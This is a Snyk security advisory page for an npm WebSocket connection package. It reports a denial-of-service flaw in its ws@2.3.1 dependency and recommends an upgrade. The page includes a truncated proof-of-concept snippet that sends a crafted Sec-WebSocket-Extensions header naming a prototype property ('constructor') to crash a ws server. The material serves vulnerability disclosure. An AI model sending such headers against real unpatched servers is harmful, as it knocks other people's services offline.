Splyt API connection handler.
Vulnerabilities 1 via 1 paths
Dependencies 78
Source npm

Snyk continuously finds and fixes vulnerabilities in your dependencies.

Filter by issue type
  • 1
Filter by issue policy
  • 0
  • 0
high severity

Denial of Service (DoS)

  • Vulnerable module: ws
  • Introduced through: ws@2.3.1

Detailed paths

  • Introduced through: @splytech-io/splyt-ws-connection@0.2.5 ws@2.3.1
    Remediation: Upgrade to ws@3.3.1.


ws is a simple to use websocket client, server and console for node.js.

Affected versions of the package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.


const WebSocket = require('ws');
        const net = require('net');
        const wss = new WebSocket.Server({ port: 3000 }, function () {
          const payload = 'constructor';  // or ',;constructor'
          const request = [
            'GET / HTTP/1.1',
            'Connection: Upgrade',
            'Sec-WebSocket-Key: test',
            'Sec-WebSocket-Version: 8',
            `Sec-WebSocket-Extensions: ${payload}`,
            'Upgrade: websocket',
          const socket = net.connect(3000, function () {


Upgrade ws to version 1.1.5, 3.3.1 or higher.